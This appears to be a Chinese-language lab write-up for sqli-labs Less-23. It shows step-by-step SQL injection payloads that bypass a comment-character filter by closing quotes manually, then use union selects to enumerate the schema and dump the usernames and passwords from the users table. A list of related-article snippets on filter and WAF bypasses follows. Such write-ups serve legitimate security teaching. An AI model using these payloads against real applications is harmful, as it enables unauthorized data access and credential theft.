?id=1

?id=1'

''1'' LIMIT 0,1'
先去掉左右两边各一个单引号,相当于语文中的引用
'1'' LIMIT 0,1
很明显知道是单引号闭合

SELECT * FROM users WHERE id='$id' LIMIT 0,1
因为过滤了注释符,我们可以手动闭合后面的单引号

?id=1' and '1'='1

?id=1' and '1'='2

想使用报错注入的,因为是会有报错信息的

?id=1' and updatexml(1, concat('#', database()), 1) and '1'='1

最后可能会多出了Limit 0,1这部分,导致语句出错了

所以放弃报错注入

尝试使用union注入,因为是有回显点的
?id=1' order by 4 and '1'='1

查不出字段数

直接使用union,来逐个测试字段数
?id=1' union select 1,'2

确实是可以的
?id=1' union select 1,2,'3

查看回显位置
?id=-1' union select 1,2,'3

查数据库
?id=-1' union select 1,(select concat(database(), 0x7e, @@basedir)),'3

查表
?id=-1' union select 1, (select group_concat(table_name) from information_schema.tables where table_schema="security"),'3

查字段
?id=-1' union select 1, (select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"),'3

查数据
?id=-1' union select 1, (select group_concat(username,0x3a,password) from security.users),'3

SQL注入 Less23(过滤注释符)相关推荐

  1. MySQL注入 绕过去除注释符

    MySQL注入 绕过去除注释符 1.MySQL中的注释符 注释符的作用:用于标记某段代码的作用,起到对代码功能的说明作用,但是注释掉的内容不会被执行. MySQL中的注释符: 1.单行注释:--+或- ...

  2. php sql注入判断,php防止sql注入漏洞过滤函数的代码

    php防止sql注入漏洞过滤函数的代码 //整型化 return $id; } //字符过滤函数 function str_check($str) { if (inject_check ( $str ...

  3. php防sql注入什么函数,php防止sql注入漏洞过滤函数的代码

    php防止sql注入漏洞过滤函数的代码 php的整站防sql注入程序,在公共文件中require_once本文件即可,感兴趣的朋友可以参考下. 复制代码 代码如下: //PHP整站防注入程序,需要在公 ...

  4. sql注入中的--+注释问题探索

    在sql-labs游戏中,经常使用--+放在最后注释多余部分,而mysql中的注释符为#和-- 却不能直接使用,以前没学过mysql,一直不理解,也不知道+号的作用,今天有时间特地探索了一下,算是搞明 ...

  5. SQL注入一些过滤及绕过总结

    前言: 前几天做了几道SQL注入的题,一上去就遇到这样那样的过滤,弄得我很难受,所以这里写一篇关于过滤一些的总结. 1.过滤关键字 过滤关键字应该是最常见的过滤了,因为只要把关键字一过滤,你的注入语句 ...

  6. SQL注入中,注释#、 --+、 --%20、 %23到底是什么意思?sqli-labs-master

    1.# 和 -- (有个空格)表示注释,可以使它们后面的语句不被执行.在url中,如果是get请求**(记住是get请求,也就是我们在浏览器中输入的url)** ,解释执行的时候,url中#号是用来指 ...

  7. SQL注入和WAF绕过总结姿势

    自己复习专用,大佬勿喷 文章目录 前言 一.注入手法 联合注入 报错注入 布尔盲注 延时注入 堆叠注入 二.绕过姿势 绕过空格 注释符 括号 引号绕过(使用十六进制) 逗号绕过(使用from或者off ...

  8. 7-Web安全——SQL注入WAF绕过之注释符号

    SQL注入过程中注释符号有以下几种表达方式: -- # %23 SQL注入过程中注释符号的作用是把后面不需要的语句注释掉,以保证SQL命令的完整性. 以Less-1为例,分析源代码: $sql=&qu ...

  9. mysql注入绕过单引号_SQL注入-绕过过滤规则

    过滤规则产生的原因 前两篇举例了SQL注入Get请求/SQL注入Post请求的案例,都是因为程序要接收用户输入的变量或者URL传递的参数,并且参数或变量会被组成 SQL语句的一部分被执行.这些数据我们 ...

最新文章

  1. 数学知识-- 信赖域(Trust Region)算法是怎么一回事
  2. Shell中的数据重定向--输入/输出重定向
  3. FFmpeg AVCodecContext结构体debug变量剖析
  4. linux arm内核栈切换,ARM Linux中断发生时内核堆栈切换
  5. iis5.0+php5.0+mysql5.0配置完全手册_IIS5.0+PHP5.0+MySQL5.0配置完全手册
  6. jvm对象从新生代到老年代_JVM内存管理、JVM垃圾回收机制、新生代、老年代以及永久代...
  7. python第三十一课--递归(3.递归的弊端)
  8. 主流Java微服务框架有哪些?-开课吧
  9. 两个文本框异动任何一个能即时更新计算结果
  10. 2021-2027全球与中国镀铬钢管市场现状及未来发展趋势
  11. 流水灯verilog实验原理_6个简单的儿童科学实验,培养孩子的创造力和发散思维...
  12. 如何查看网站是否被百度(搜索引擎)收录
  13. datagridview获取行中列的数据
  14. android设备打开5555远程连接端口
  15. gorilla/mux 翻译
  16. 解析ArcGis的字段计算器(四)——日期字段计算
  17. 推荐和讯网改革开放三十年系列文章
  18. 日志服务十大经典问题
  19. springmvc高级(拦截器,全局异常处理,文件上传)
  20. 软考系统架构设计师 - 第 3 章 信息系统基础知识

热门文章

  1. 【日常学习】【搜索递推和其他】10.21.2015校内测试总结
  2. linux内核是否支持cgroup,如何检查我的Linux主机上是否有cgroup可用?
  3. 实在智能RPA亮相2023全球人工智能技术博览会,“能对话的数字员工”引领智能自动化新篇章
  4. 程序猿要爱惜自己的身体
  5. C语言0x00在无符号数组使用中的注意事项
  6. [Activiti] UEL 统一表达式语言 (任务节点 Assignee 通过变量获取)
  7. 我看盛大 [以下内容仅为个人观点]
  8. 一个用于Fathom Analytics的简单Vue插件
  9. 微信小程序--多视频滑动播放(踩坑,填坑)
  10. NHibernate in Action ch2 Hello NHibernate 读后